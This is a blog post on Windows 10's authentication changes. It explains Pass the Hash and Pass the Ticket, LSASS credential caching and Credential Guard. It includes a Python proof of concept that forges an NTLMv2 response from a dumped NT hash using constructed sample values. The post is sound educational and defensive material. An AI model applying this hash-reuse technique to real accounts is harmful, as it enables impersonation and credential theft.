Windows 10’s Security Reboot, Part I: Authentication

Michael Buckbee
2 min read
Published February 26, 2015
Last updated October 21, 2021

There’s incredible excitement about the Windows 10 release. If you completely quantum leap over Windows 9, you’d expect big things. In December, I was talking with NYU-Poly’s Professor Justin Cappos. He’s a security expert and had nothing but high praise for Microsoft’s security group. But he added their cutting-edge research doesn’t necessarily make it into their products.

With Windows 10 officially unveiled in January, it looks like the security researchers have finally gotten their way.

The End of Pass the Ticket and Pass the Hash?

While Cortana and HoloLens may have stolen the show at the launch event, the other exciting news, at least for us security geeks, is that Microsoft is planning a complete revamp of its rusting security infrastructure.

Jim Alkove, the Windows 10 product manager, gave us all a heads-up about what to expect in a post he published back in October. That was also about the time that Microsoft released the Windows 10 Technical Preview, which you’re free to download and try out on a spare PC or in a virtual machine (VM).

In my next few posts, I’ll take up some of the major changes in authentication and data security that are currently slated. The caveat is that none of this is completely finalized: the official release of Windows 10 is still months away.

In any case, Alkove says that Windows 10 “aims to eliminate” — long pause — Pass the Hash and Pass the Ticket.

Loyal Metadata Era readers know that we’ve dived fairly deep into the PtH and PtT waters. We’ve also written an ebook covering these two credential-theft techniques (PtH reuses a stolen NTLM password hash, PtT reuses a stolen Kerberos ticket) as well as other attacks used against Microsoft’s NTLM authentication protocol.

For those just tuning in, the key point is that neither Windows nor Linux stores plain-text passwords. That’s just Security 101. Instead they run the password through a one-way function and keep the result, known as a hash. (Strictly speaking a hash is not encryption: there is no key, and it is not meant to be reversible.) In Windows the NT hash is simply MD4 over the UTF-16LE encoding of the password, with no salt, so two accounts with the same password have the same hash. By all means, read Rob’s hashing post.

Unfortunately, in Windows the password hash is equivalent to the password in terms of the power it gives you; the fancy crypto-speak for this is plain-text equivalent. NTLM authentication never sends the password and never needs it: the client’s answer to the server’s challenge, and the server’s check of that answer, are both computed from the NT hash alone. In other words, hackers who get inside a Windows system, which is easily accomplished through phishing, only need to collect password hashes to masquerade as those users.

Where do they find these hashes? Windows keeps them in the memory of the Local Security Authority Subsystem Service (LSASS), the lsass.exe process, on every machine where the user has logged on. So they sit on ordinary laptops and desktops, not only on the domain controller.
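To make “plain-text equivalent” concrete, here is an added example in Python; it is not code from the original post or from Microsoft. It computes the NT hash the way Windows does (MD4 over the UTF-16LE password, implemented in pure Python because many OpenSSL-backed hashlib builds disable MD4) and then answers an NTLMv2 challenge twice: once starting from the password, once starting from nothing but a hex string of the kind Mimikatz prints. The user name, domain, password, server challenge and client blob are constructed sample values, and the “domain controller” is a local function that, like the real one, holds only the hash.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Implemented here because OpenSSL-backed
    hashlib builds often ship with MD4 disabled as a legacy algorithm."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    # Padding: a 0x80 byte, zeros up to 56 mod 64, then the bit length as LE u64.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """The NT hash Windows stores and LSASS caches: unsalted MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 NTProofStr per MS-NLMP: HMAC-MD5 keyed by the NT hash, then by the
    server challenge. The password itself is never an input."""
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()


def server_accepts(stored_nt: bytes, user: str, domain: str, server_challenge: bytes,
                   blob: bytes, proof: bytes) -> bool:
    """What the domain controller does: it, too, holds only the NT hash."""
    return hmac.compare_digest(ntlmv2_proof(stored_nt, user, domain, server_challenge, blob), proof)


# Constructed sample values; not real credentials or captured traffic.
USER, DOMAIN, PASSWORD = "jsmith", "CORP", "password"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
# Skeleton NTLMv2_CLIENT_CHALLENGE: type bytes, reserved, zero timestamp,
# fixed client nonce, reserved, empty AV_PAIR list terminator, reserved.
CLIENT_BLOB = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + b"\xaa" * 8 + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4
# The hex string an attacker lifts from LSASS memory (Mimikatz-style output for "password").
DUMPED_NT_HASH = "8846f7eaee8fb117ad06bdd830b7586c"


def pass_the_hash_demo() -> dict:
    """Compare the real user's answer with one built from nothing but the dumped hash."""
    stored = nt_hash(PASSWORD)  # what the DC keeps for this account
    user_proof = ntlmv2_proof(nt_hash(PASSWORD), USER, DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB)
    attacker_proof = ntlmv2_proof(bytes.fromhex(DUMPED_NT_HASH), USER, DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB)
    return {
        "dump_matches_password": stored.hex() == DUMPED_NT_HASH,
        "user_accepted": server_accepts(stored, USER, DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB, user_proof),
        "attacker_accepted": server_accepts(stored, USER, DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB, attacker_proof),
    }


if __name__ == "__main__":
    for name, result in pass_the_hash_demo().items():
        print(f"{name}: {result}")
```

All three results come back True: the dumped hex string is the NT hash, and the attacker’s proof is byte-for-byte the one the legitimate client would send, because nothing in the exchange ever touches the password. That is the whole of Pass the Hash; the only thing the attacker had to do was read 16 bytes out of LSASS.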

Containers Are the Answer

Having these powerful password hashes on users’ machines, rather than only in a safe central location, is a feature (not a bug) of Single Sign-On (SSO). With SSO enabled, as it is in most organizations, Windows reuses the password hash cached in LSASS (remember, it’s equivalent to the password) to authenticate the user to file servers, mail and other resources without prompting for the password again.

Hackers have been very effective at exploiting this feature of SSO. Using tools such as Mimikatz (a research tool that malware routinely bundles), an attacker with administrative rights on a machine can scoop the hashes, and Kerberos tickets, straight out of LSASS memory, effectively stealing user credentials without ever knowing the password itself.

With Windows 10, though, Microsoft hopes to stomp out these tools by moving the secrets LSASS holds into a walled-off region of memory that the hypervisor keeps out of reach of the normal operating system, even from code running as SYSTEM or in the kernel. It is not quite a separate VM: the feature shipped as Credential Guard, which runs an isolated LSA process (LsaIso.exe) in a virtualization-protected mode beside the ordinary lsass.exe, so a memory scraper that lands in lsass.exe finds no NT hashes or Kerberos keys to take.

Microsoft, of course, already has its own hypervisor, Hyper-V, and in this latest Windows version it looks like they plan to lean on it much harder.

It’s way too early to say whether this approach will succeed in blocking Pass the Hash and Pass the Ticket; the devil is always in the implementation details. Two limits are already clear, though: isolating LSASS only helps on machines where the feature is actually turned on, and it protects secrets sitting in memory, not a password that a user types into a phishing page.

We’ll continue with our overview of Windows 10 security in our next post, where we will take up other authentication changes. This includes multi-factor authentication, tighter integration with enterprise PKI, and we’ll learn about FIDO and security ecosystems.
